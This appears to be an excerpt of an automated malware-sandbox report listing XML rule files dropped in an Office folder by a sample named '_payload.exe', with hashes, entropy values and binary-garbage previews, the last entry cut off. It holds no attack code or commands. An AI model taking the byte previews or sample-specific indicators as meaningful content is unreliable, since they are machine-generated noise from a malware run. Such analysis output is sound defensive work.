                                                                                                                                                                      MD5:BD1C786A8DEF132294E54321726638B9
                                                                                                                                                                      SHA1:4D83DD268F0670AF4F0C03AAAD351467EC9C691B
                                                                                                                                                                      SHA-256:D45482462A2914EC6D147BE6750D923DB989F89BF3B2AF49C2406EA382EA7E6B
                                                                                                                                                                      SHA-512:E0F01BBEE6FD7C2C8B6DF441432D0BF3465F4AAFDFE9449FB0C1B7DD924549ABBE39354899A37EBAD3E586A26FD2CB7CAC9B32AA0537CA4E6B7E1F01BD980406
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml...,x?....U..,..j/`..i.,......4..........J....Lm....:..o|*:...#..w"b.R..xc.6.q....../...3h..e?...{..FX...N.C..q....B...Z..=..6i.U.....E.R...'..g..v...[-.%...5..=.-1LG.....U..'..S%...".YUDXO.5.."..a/.|.s\..:W.9N`E.........Y...........`zV.........1l..L.B.}@..............7.../.....6...2.y...kDz.F@F.G.......V.B.'..#..'*O.S....q.s ...t...q.P,.oR..-s...-&2...P..yRYY...........[..R.=..d............p.~.n.+^.R...=.B..5...q..G.\./....Zz`.Tiq...$4N.^S(.........|.5*....K...U.+W$$l.u!e.S.\8.Hf......|./.08....4.M..][.b%.#.Y.....Y"...v......4..^...s.Xr..8l.."._)..^.Y{...~...`m.X..7\.........o...?..#k.<..P.z.)....u3!?.U.......Ks[....N}..s.%*....*4..l.d~..BK.YW@... w.5....i._...W........%83.A...h......].}*.[.sF........J0.....1.U...yt.A..f....C.'....R.L.3.. ......}.P).DJXs.,..b.n..5..=*.z}..cO..y.N....n.......%...JSh...,.3G.....c:..M.r......v.8.....w....'ZEC:...J........@....7MR..........KOV.3.gH.L..........wz.p.e.....6z%X.....:.....~..........Q.9...x..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701550v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1701
                                                                                                                                                                      Entropy (8bit):7.900112912112956
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YmyNDtivh0M8cdfO5P3FtUbxGE/IDeMl/9DwTDmU3UvgUwkWYd0hBk+Le8l4rG2X:DyN05dfO7ibcE/ID8DmssOBN7lAD
                                                                                                                                                                      MD5:93D373E75FF43D46DF608E39C27CD2E1
                                                                                                                                                                      SHA1:994FE41AF46979687D618D17EF1F61BD501EF6FA
                                                                                                                                                                      SHA-256:E0570334A293ACE259AC5AED8900FFBFBB1B1B95B44CE8B8A99B7B290E646E73
                                                                                                                                                                      SHA-512:F9EC6C04A8A882E93B012CE4C071C55AF5B312FC88D38D3D4E11A54FAD7885CC5E2367449113C352E231959D2AFD8611317B6090179D5BCA784C8EBB581C432B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml%.Z....c.j.w5.(N-.j.C.^.9...X....]...{Sm.r.u.F..,`....IT.n....~u..0...H~...AT..F..e...^..2|...../.E.".JPq.1@...F. ...J......6YYt.s.GG...W.d2$...A.u..[I1..q\...k$.O...s>.N.^B\].n.oO.\...NS-.b......C'..|.p..g..8dl../*.R..`.s.e#.XT.`....Z.[ ..."p.P..Q...........S.T...K..l.Ybjr...j..9.!...,...ZD.>=J.....a...../....X...`.L...J@.:.....?p}..........2r(E*...3..^4....'.t.x.\q..e =...Uv.1..}a..4.&w.... .&..b...F=...R.#...v.....|.[..0..Og.e.]B.../.?w"..M16...Wg...{,%..v.:.A..p%...1.....0ya.so..B.U.S.....L*..g..9..b.B.'<......> .EL...h..[..%..........IA..3.~...=.V../Q..M...D.p..KV.S........j$.:..:"A.....c....=.l.73...h/..".`V.....w./r.Z...@.5..w...........2FZ).@.._........."T"...BA...B|.im8|......pQWz&....d.2.B.2N..X..G..{..$_1{..1.[.....LL.:OS.x.B.-..]...I...".O.Q.#.t.......6....X._..k...bw3.J....{.K:..8..3...o/...}S..K...d.b~_n..Q.>F..~...Q.c7 .H...n5.A....8........|!...}....NR.,.l.Dn....z.....0...P..e........r&..;.Pe.-.E.=K.L.....O.w... ._..st..?..(.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701551v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1738
                                                                                                                                                                      Entropy (8bit):7.8908206868972925
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:IBBPg4bORT68jZ02JtSGhwqc0ul0cXcTeB3NGuD:oBPFbORPFhhd0moNX
                                                                                                                                                                      MD5:74A39837DB8C2EC068B026F945B246C1
                                                                                                                                                                      SHA1:F37577A15BD149DEF0EE6910E0CB67CA2D361E20
                                                                                                                                                                      SHA-256:A0AA2230DCDDB69CDE95DFD703571E5BD334C5B2F21E92A0AE61EFF85512CAE0
                                                                                                                                                                      SHA-512:C2098588C562919717986EA36366B060D89A2DC1F379FC513B2BD54897DB7DC9F83B9202D558885AC872B8442EA054BFACBFFFF2C9856B1C8DE5A80674B3CF68
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml`..S.K...T.+.i..(....0Y....M.).[....MB......v..V0......V...<...{.=[@.y.2..mkW..t...%..9t-..D.d...J#..1.*.m.5..D..o..._/.x..L..z`.!.M.Y(.5..|4...&....r..T{.%.s.H.av...|.;.8f.....e..Rr{.P..:....}.O..W.......s...8..N....*.P~..+.|>w|..........U^.c.c^...5\r...........W.v.......~....?o....~.,....*f......`.u.T{fA:.e....J7..i..A...y....H.....`.......^._.m...A?.S_..P.+....)2.Z....3RH......A...8.K.!.\...2.!..8..\.4.yy...3,.......!.zXy./+^..1!G.L0;C.,@s...'+...o3t.6...$....VOH..Ob.....o.%.....54.w;.>.?..h...{3...|......_W.1R+.PB0....._.r.}.t..RB..).c...|......!...d..y.E.JB,.*.....s...Qz..y.Z....%...s.Z.rb........:. .c.E.?.hP..5.54:...(&.....2..R..I (..K.J...%.+...N.Z...S`..&..2N.x5._..;..?....E....h.z8e>...d...o.....N.F."..<.HZ:.H.1B.d6..s..L....[...>.L..T..3VV.-.;...W_~FX..W7.?..W]V...o&.U..]7y..f=.r..k.qe.Nw.B.....[..fi.K..q.....u.....U..0...[\Vt..w.."b..`..X...a..Q..d.n.........E!.......lpP{.J.L.x.2...c.U.S./.Ww.d!......c..<4..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701650v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1705
                                                                                                                                                                      Entropy (8bit):7.872913736247222
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:wKoM4T4DqCn0p/dBp2koZzP0gL9wHPdJPYJ8hD:wZ4DqJpwZzJOHV5
                                                                                                                                                                      MD5:6BC1D2715E44332119DE61ED98AC5232
                                                                                                                                                                      SHA1:3E14B6EF5CCED34DA57CD1ED85059E0432A08B57
                                                                                                                                                                      SHA-256:DC60F1C216DE511DEB9AF33C34FBB67514E2866D6EEB03669E310BBCB47B5F8A
                                                                                                                                                                      SHA-512:449B2EA91BD7BC4ABA917A5A97AEAF7448E6D5845B47429ADEF170F6CB0FB0CA3C6093BEFB323BA428D9D18DCB669A7F43B718BB159CF3A9A4EA0B2034C33834
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.TV..-.t.[.....|..o........m.O;~.e..~/..a.8..J..e#.\iMz.G.F,.....W....(..)..9...oEz.D......Jo.u|.$....H..<.|.o7..0{.i.!.......4.m.O.I.D...F<..z..x..n._|.=V..].7....d%A..I.4N..w...._....^.^..\...WLDi..J...S.N.jS.Cc.py.8g]..y...+.U<.......x...d+Q..........wG.........c....Z.F;..(.Uq...z.m..+P.#R./w..@.(#y.-L.c.X....&.....A.9V.X..=).....J.|.e5co.~.....?..n....=.A@6...B...).......d....q....g.S`.(....`0..^....8;....9J.XS-...F..R.p..o...D...?!....=.I)N.K,f..#&..'......$..}$f....5..h....:Q3C.e.|....YG.|..,3..A..ftb.S.r3.B..I.qo....iAc....._T..Ld...............2.e.......S..+..6.V.........9.....?..7b.../|..d..Q...9D.Yi.Bz&l?..ra*(.;.....qG[.;.m..-Z h.#r;(...y..G .9.%........Lc.....Q.#i9C.s.+.~ ..6...X..).(....Z..m;...O...Y.\..I,3..8.!eV ...U5CK.$..Q.+".....2.I..n..".b......<......B..9..Y.....u..).Ce..V;T.u.....".U...c..........l...1-e...p....|.3.K._..x.../.O..f...$.g.."..D....7.Ny)9!.V.....&......&;0.>..P}#..-..M.z.bR.d..$..+..|.R......\......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701651v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1742
                                                                                                                                                                      Entropy (8bit):7.9006819947742475
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:4tAA0RylQ6lVcJXh4i9rv/EDVJk0Shpcjm5X89XcAx2RW5ewT2bD:4kgFQRyilB0SvcwX89XERW5fAD
                                                                                                                                                                      MD5:D6B90AE77CFBAEFD6FD5E3D5B12D813D
                                                                                                                                                                      SHA1:5540BE339D6D39157F509AA0FD14D7DA95D7837A
                                                                                                                                                                      SHA-256:08A877921CE5B5AD2EC06F52D15DCB1B9FDE03115E10A130BE15702E84558B94
                                                                                                                                                                      SHA-512:BAA46C45FF08FAAD2A3DB6B20096C863AB82FD506C4C34ADF776D4DCCCF59C41C4E6686D36B25DE38C064B768B18C380041C7F5D56E110BABDBDD55A0BB49746
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml....m^..,.....!._..d..XiO....}.Q......{iC<`D....O.r:3.....D......3_@f.j46.v.]..2...p<.}.H.....d.....1..}..kK.`.Qe).[E ...>xO.y.-...[i}...'.h.Q=....4..xcu#.../.......v.NI..{..x..x.....H...:....5.t..{ .....~..J...#.'......7.rN..EC....X..,.../.>.'...n.E...J...6@0..)B....&..w...E>...Y........+.V....T..tf...J....a.4.g$...W.g... ....p&A.I...<SA.6.....q.R...*K~..|...x....3......~..Zs.......V.Q..........gW..G..h|...\...M#.X.....R...v...U....3=`..4.@....E........tA.....K.U..5J..m.Tf;8..A.......*.E.....|..~z...Q.....w;........lJ[8....p.........&......,..B@j.gc....5k...a...8=.X..L....*..).=.V~..`..}.m#$9..$..2>.uO.6K.8.P#.3:%..S...c..n3.}l.:.....lt0....fMr.:n^....i.*w..5..^x...yF.=.u4.I....,..z..?.].D.Ln.\...a.Cj..h@F.i..*......n"#..>..H...m..E.O.u..db)y.v.?..E......B.............CN{. t.c..k#..R'.B.kL.Y}..j..b.1...P._.%..F.i...N.....I..Uu..z0U......s.-...\M.:.........f.....1...H....a.5p#.s}P..q.+..(>y.n.....t.o..\.If..mp.(.$...... ..Rx[

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701700v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1719
                                                                                                                                                                      Entropy (8bit):7.888026566114567
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:nzBe/peFMcxXdeylyR0zIoY3DjN7tv8azuFLcct6KAV3D:nw/hcC7oODjt18azuFBjGz
                                                                                                                                                                      MD5:ADC29BF378FF67BCC57584331E5B5351
                                                                                                                                                                      SHA1:25E64C0C8DDE11C96FF548D8723B4B78DD029EB8
                                                                                                                                                                      SHA-256:29A524A13048FAD320717AF948D46336FEAFFFA3C1055F0C8A3E9F60293F33CD
                                                                                                                                                                      SHA-512:54CF2C743604AEF463AFA867ED0B1ABACF774943B3AE42BC8C3F9841F519D716CB879580AEFF8E944C22613445389C5C4769F08C70DD166F05A16A5FB239948D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml~........k...%~.[.....0.wW.@,....p.v...r.N..e.x../i.F_.|....a....V..6..z..........r.!b..6M.C5.....w>.>".6m+1.y.@+....E?!hou4..j.*.:.F.p<.<;.L@.......:.M.sM.....Y.q).b_......B..o.P&.W ....F..9}`....GK.z.N....Z.}`v.....Z.noL.?v.&ZMn...#=...L|c3t..W......k ..k..!....C.....d....$..P. UI.y.....w.|... :...../p.u..t=..].4.b..Wb.61W.P?n....H.A.k.........c...JE.....m...L6;X..f.}..u......U+...<..\7J...U...,.....'.tOB>....1.Q/../...-..d.-.....2I...s~.y.xo}_.}0.......:....._.....u.c.E..Z..v..E.]..m...q/ .#0..u...`k...SHHF>.#_%a..Z.bZ".....y.1!.N-?;.:..h.|U5.w.q_............)... ..-.Vc+.Q!8..g.P_O.<e..b.S.V........*.......)....Kv.......".*$8....H..r..`g....|...v.z$...f.3.......mn....h....2w<.)...E....|..B..&.~.Io#.I?w.W$.d....6I...$.`Q.33....=...#....[m....O.%.......[...~.w....'/d0o}...O.#... ..r.n..<.(...S............r.....S.Q&C.MZ.!Fz8..h..T`>pe...MG..`:.......F.EN......%S|......8.]..B.B.d(...l.. .....:..D\...p{...q.....y.....5.".o.k

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701701v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1756
                                                                                                                                                                      Entropy (8bit):7.884638185803675
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:RjgR3PuDMk3tRNFlwe5mDfiYjYqRzRBmBvsjahAKe7lKuyvtYPX2dg9ftlVOpzte:A3PlkdT7weYDfnRYnez0mPX7etarD
                                                                                                                                                                      MD5:C7D93AF94CE37667AEFBB87D2853C58A
                                                                                                                                                                      SHA1:A658FE62B4F76D5B0932C0818A1E12899D9520B7
                                                                                                                                                                      SHA-256:7301C05543C4BC76E19BF229EB899418BA28334EA247D67864091DD31E41CC82
                                                                                                                                                                      SHA-512:F44919511D4DCC144447CDB8D056AC74014C68FF82C3B3C462A10C9B37CE7D6DD2861A4D4D2191F74BC52D5F98E1652DD418BDEEC0A6CC6489684E313EA7F965
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmla..".=..._..0..'..p..Q.(A.+N.....H.........Y.I;.....D.K'..;DjQTR....Pj......|-7@*p..)G..:..{}.v.`JW......m.W...@.7<3.43..<..'...6Q.h..).$.!.~C..+.....Q...PW.+V.d..H...o...;.._P.k_FaZTz..L.....T...Qf.`..........#.X}+q.............}........-.(-@\...D.U|......4).!.\..>^........}...1l.?.!..W...l.L....*a...{.S.x.w..z.h.q.w$@.......s.....>..1.vG...i.K...o9...:i..f.........mn.F!.O....Xt.`V.d......w.W@rMf.p.....=.......s...|.t...`.....K.....TMY.G.%.....&....}...'N..9+.7.fK..fJ...C.r`k....tD.#../.8.r....l....L......u......;?q.K`G...d..2L..n.}.(.../v...,..c..).4..Y........B.y..6...%.&..%uV.E.2`...A.b....#.n8p..S..2.h]v....Z7.....~...(..8.;,X6!0...G..I..YP,.@42..z....`d...2..d..t....6.t.gu..VE.s..|.....A...:....aJ...$40..1r.y.......o.ay.Y.VI]...I.^q.x.:{..p.kx#..W...Qfo.........Gv....9#_.....'./Kbcx..@w.%&#. ....Q.....c2..........B..T.&.6.p....u...oQ..Y....+".mlo.u"..w.@./gl@..6...,d..5...c.(..[......e.'.r..G..}<d&.T.]q.n...P.k.7......+0.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701750v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1697
                                                                                                                                                                      Entropy (8bit):7.888948396599983
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Lmw9gd2P5cAyE8/htY8H2bb9D1ahKxvjR27uD:LBgd2PuAy1/72ySjQW
                                                                                                                                                                      MD5:D04D714F2DC555F17DA440EEE990537C
                                                                                                                                                                      SHA1:58BB15B3D76DE7593D7F97D941B9F93F6EA4DE99
                                                                                                                                                                      SHA-256:E0DB92C60B4C97147E9B170C52D4F107987A647D5BB968E16B1F35583C0B1F3F
                                                                                                                                                                      SHA-512:7625B5ED72345212C0BEBEAD3ECC9EFB0AB53BE0A88DB84C62254E05A1DF846948C3CEA72EEE84D62B25D503BAE04738D7897B3991824A6D2D081B985E883B15
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml^..M|.[./....V.Fp|1*.x.....$~.r.Q.|Dc+G..N..R.z...... .:.+.R..D..?...!<t.R.4X2.J.}.u.A.~".$..J4....Sy....N~...l).g._.w..K.a/i+.u...!l.K..1?...*..`.'.......1..1.,GS..E... ^^M.g.[..%*/...WMI..He..%t...:wb...~.v.A.....9.c..X..k...!3..J..0...n.....2.R.h^au>..K.y..X.Q..>..%]'....d.3)U..E.fGGQ..N.E........-.H.GF.bYU.qN.....dKz..+c.X;L.L.V.Z/U.t.O..{...+.%ir.......CZ[....F....:..@M.........Y,k-rY~.h!5.....E%....1&.,.}...E...s......N.. 8i.c....B..I.G.....V.......c]....b.1qWSK._&..?\..y<f.b-.dNu2.$..D..2b$..I.S.a..&s}Wh.`..0EM.9.d..j.[...A..h.d./H`...h..no..C.o..2..R.?.@U.Y).....^..w..S.2P.._j.i.8g....8*".....#..f5.f8&W....H.,.b-...o.N...>M+..g.&...N... ..r.j...&...1@.e[..o.0f".O.......l.xt........^`a5..:.&.EU}.....,.r.....Fc". .u...?..B2m.....*._o...sG..o.f......R~?b../..3..u..H...$7..+...f.;...u[c...S%..%,^7\m.-_.O.q:....v.+..<..7.M...zx.r(.=Fn.q5j[.b..}[..?...P...'.m..(.!5....l....&j[...z.i..9?5^.y%.Ne.X>...D...g..?..5.G7A..GZ...g.p..J*v[..Vg

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701751v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1734
                                                                                                                                                                      Entropy (8bit):7.880767142120005
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:8xGOqNm0tpgIu/rvN4acxIlUfYhnOJgKB5Wz1yhv4jzo1KEHx5r87srF2mJJfJ1F:8odn/e3VOeSW+wjM1KaAEF2+2uD
                                                                                                                                                                      MD5:30C3F0AF0AABDA0AE6B04D99B7E3CC7F
                                                                                                                                                                      SHA1:9876C346DBF4B1A8A74E77AACA16EF659623B1B2
                                                                                                                                                                      SHA-256:3CF99976443D86C45FC131EA06CFE11E1BEF100FE7F53973FABB4B09618EC97A
                                                                                                                                                                      SHA-512:82E71170C0072F901B2C71C3241799FEF6518F8137A16996EE9605D651A64E1721A204E20509B806AA3D10432958B95EE505F28F7C240258CA375ABAD1988402
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml TuC......1..J.....|.g..U..G..K.=cI. .k.."..%.7nP.\g ..4....o...5e..=...........=.d.u......7..s...V..e>!.%l@...4x.u....l..r...PW..$..@.t......2......#....l.B.....3..N.a...wg..sT..V...6s{.6o3n$...Bt-...3b.o^'...W.CrP..L.pe...\Lp..4h.....N...Bd...|i|..=.....{...nr...jvL.Y....W}l...o...Pj..r.n.qYyq...P.....I.. l.B..>.OW.eY..>....6'h......g....n...8.H.de.e...*0.H).T....G..........u`.?...:.....0.{.#.1..[..m$.~Iq...B8.g..X....0....Ze.ZP.8....N..@......4.........]a]..i...S...(.7...<Gb.....vG.u.AN..H*..\n^,T...d.R.:..V9..G .m........T,...o.=+E?..O.M....1.}......!o...De....Z%.bY[;... .RMU@X..[a./b..t.e". N.i..M..."s3H.4.....Q.Xu...yFREI)n>...I..5eH;...9)g.8....nB..........j}..\z.6..Z...!.X.&.&..l.......|..1|3e#(..E..W..z...........Z...f9.B.'....q.m.+.....-.../.>..[x.X.8s*.%([.w.....3..R..p.<D.py'."...'....[..T..X.g5.P^~..[f...6.?......j..[...4....!......0.zG.(D.S"..........ZC..!H...D..w....8......5.uD....z.E....KT....p..fE.......b....#./.s.....

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701800v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                      Entropy (8bit):7.897022550300859
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:fmIr1yTvQG+zq9Den9EGMfuSdL87BBoWJYD:vpcP+u9De9EdfVZ8NBFa
                                                                                                                                                                      MD5:E37E97EE3B9C8AE3F873C4BE667E4D41
                                                                                                                                                                      SHA1:5395DB94CBC9620D4267FB96B6620ACD2D533A39
                                                                                                                                                                      SHA-256:41DB5904897729B70DA3E25649CB7446DB2F20212AE5CAF3AE5D7E76861859E3
                                                                                                                                                                      SHA-512:567D2CE47B73C1BA79FD1B6A1DE964D483D463E6EAFE3749E010BC2728449ADC66D7A23F45DA9DA4451F05CB3532DAEE74E5CF9AF1E0D43420E8734AB4EA88C0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.J...c..I;.......y.....<..'.0..}......}..a.P...Jz........:......CK....v.Q0..0J.1...%...b.l...N.Ak#....; ...&y.....8..|g...].P...^(...,.kl. ..[5.8....H......lU]-t.k2.>o6.T.*.....F.X..avU..../...h.N9.%.8."I..+E.vi..6....j...P.C..H.)V.4...6..5...!t-?RqZu4......\.D..).@..._.....wY....]h.,.u...!..].T......$..dG2-....A.G.mZ.m...u...N$T...[.<.......B..n.{...U..!.ck..]`.n.6..z)..J..m...!.................i..U..b...Wi..;.LG....;].q^....P..`.M.?......l....RO.*/m...^@.I.J_..YC....H....?.mK/t....:%w{B..Y.#3<,.Ic....r.S.<.v.R+..{F../.......;..Y;......_.... ..!.]W..V..=2.\.....|7.j..?.C..]..".PH]+....VN.um.<.LS..)J{.. .....,?V.C../..8....t!.vdr......"Kk.~Q.TF=....L......p..;.r.w.....o..G...h...4N]..I....\.}.5..N..T.E.P.Z].v.g.......#...v...'C.T.....A..9.......K.$.n.8...a....sbP..Op.....n.w'}.j...pgQ...V.F}.R.y..&c...@<'....4.&.s...........<...2LX.......S9..N...Y.~F%L.../;.{.+bt.c..W.s?......ys..W..i.(..f.=..TQ.....8...N.F.D_.&......h.......r|.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701801v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1736
                                                                                                                                                                      Entropy (8bit):7.897330549728407
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:aHXx6QPW2mbDu+tJFlpVqCt+h3MOfnEuY3d9TxbY3jD:aHXx6FDHfF1oh3M4E9N9TtIv
                                                                                                                                                                      MD5:4202D19552C9406324BEE029A420818A
                                                                                                                                                                      SHA1:00A7B64E9487684CCF360A80B669FB1C815B7734
                                                                                                                                                                      SHA-256:F4FDDF24AD19CEBBC889B6FC3471BEEAED43FB19006D05B84AFAFEF1CC5FEDD2
                                                                                                                                                                      SHA-512:506218FBE9630D75D4503FB840ECC29EEF605B1BEDD78CA716A49AD040B11CA80661674111B21BF25E977E03294F5443205EE9B8AB2B722AB9803FBE352DB880
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.{RS.h.w...^l+......M.....p'.k.&....5.2@.w.V.&Q.......^j...j...y9}p3.._.X.6....<...5}..y.8.....I.>=U..=.....p.(G.+...:S.....H.k....C.i.J.%...O.-.8......H...........c-............!.Hx...M.5.......0.9D>.....M=.......l...-...M.....%.[......[I..c...._~....3..:kt...!pAw....9. @.].....Zw..#...~..K.c..j.f.f.#......;..<.E....c..P...'."... ..y..O......Y~E.~@#..O..oQ`....8T.....f.....hpz[...\...Gn......L|H..~.U,$..p.....].f...u...H%W..+...{....a.|.M..*C....g..Z.@p..e..*{....pFK...p.K..F.44.../...np..W.+.......(.M...;v.:...v..&4.I:.u..E...U.EZL.|....:.-....gK\nkE....==3.9-.Sm..0?g[-..B&...q.D .9....ic.......%i.7..:'.....=W..8..G.....>.do.FSQ......yN.\.z+`..ZF.Z.7W~v..#6.7a\.....".)Cid.2...C..kx..X...Z......d.,....y..q^._.......&..........".+...R:.1.h.p..^..;.......;.6.w/.$.&8..|B.nQ..-..h..w*. b..h.yYs..]...9....mC<BLV. .o,IPf_Wc.dr:.7........G.`n..0f.2../^.....X*.........W..%.yS.N.1.. ~..p> ...`..x..7....~7h..A9S(.q.f.l.%}n[u.T.?R..u.*....n./..'[.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701850v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1704
                                                                                                                                                                      Entropy (8bit):7.885397262282496
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yLyBWuXcVcz7tqaIZpHhI/FmJBXGcxUdhUMyxq5rY5EsWM2pv1yNDlJR7H1jndAZ:cyBWBKzIfpLH+SxlEsWHeDFRqSkCaFdD
                                                                                                                                                                      MD5:B6CF251E09BDC156017FE16072F7F047
                                                                                                                                                                      SHA1:0751694D8517B933AB531583CF2A937900343DFB
                                                                                                                                                                      SHA-256:4823EF519AD59AD317672466DE294FB7F10A66934AAF83C92077F732FBFFE033
                                                                                                                                                                      SHA-512:E175919B022B90D820865B79F20AE875E466B34E73B8D73EF6D9B99950B5659981238CDADBECCBDCD17BF209B776A212767AD80FEBB03F1422996D32EB57347A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml........fu.+.Q.................%..T.~.)u......z.....+Sr.......1.y.h..WU......`7.../.V+$.....0F.Y..BH..|.C5.<.jc....[...9...a)...@..8.\E".....o./...../~-..]U)x... m5.zdc.........)...k.....6.{.h...G.].w.Z.].{v.0..Y..Q!a9U~{....0.dVKA.....b...>......h.......{..Vj.W..cM.R....<.{....":..B3.`5....7.DD.....g.n..x.[/s........^...g...-.....I....Rw...t....s...klk.>U..../|..I!..-...7B.g.j.`V.IA>......h.k.oh...*o..#..6...b...y..fg.8..V.#9........YEB....Ya._L@.u.....]IU.s)..e|T..~..w.r.?...t...Qb.1/B;0.B&N.{A.1...`T..'..MMK..t?...u..C..:.........1.5...km.i.O...|.I...C..|R\.P...M..3d.^.q-O.@.}....O5..^..D....\.6>.MX..`........f......MB..P.........#.L!.L..z..9.3=o.....a........:.....h.`....)L..].t.}..Ox<.....n..{.OV....}$./...r..g_..S...?sv.y*.T...a...m......t...n.%..4p....Ka.c...........;w...>.y.....'^..k.4..N<..M;._^.......N.(,M)......V.-.....]b..?...,.T.D<..........F tLI.+u.O...z2...l.D..h!.....D..I..2.m.i..HX =+N.*.......xxl....1X.7.....E$R

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule701851v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1741
                                                                                                                                                                      Entropy (8bit):7.875196019162114
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PhvphgHfb7xZ6OClK0D6eOMGqYUvSkQzyOh4qXdzW9D:PhOff1CM4VOMGvWeyO2u9WF
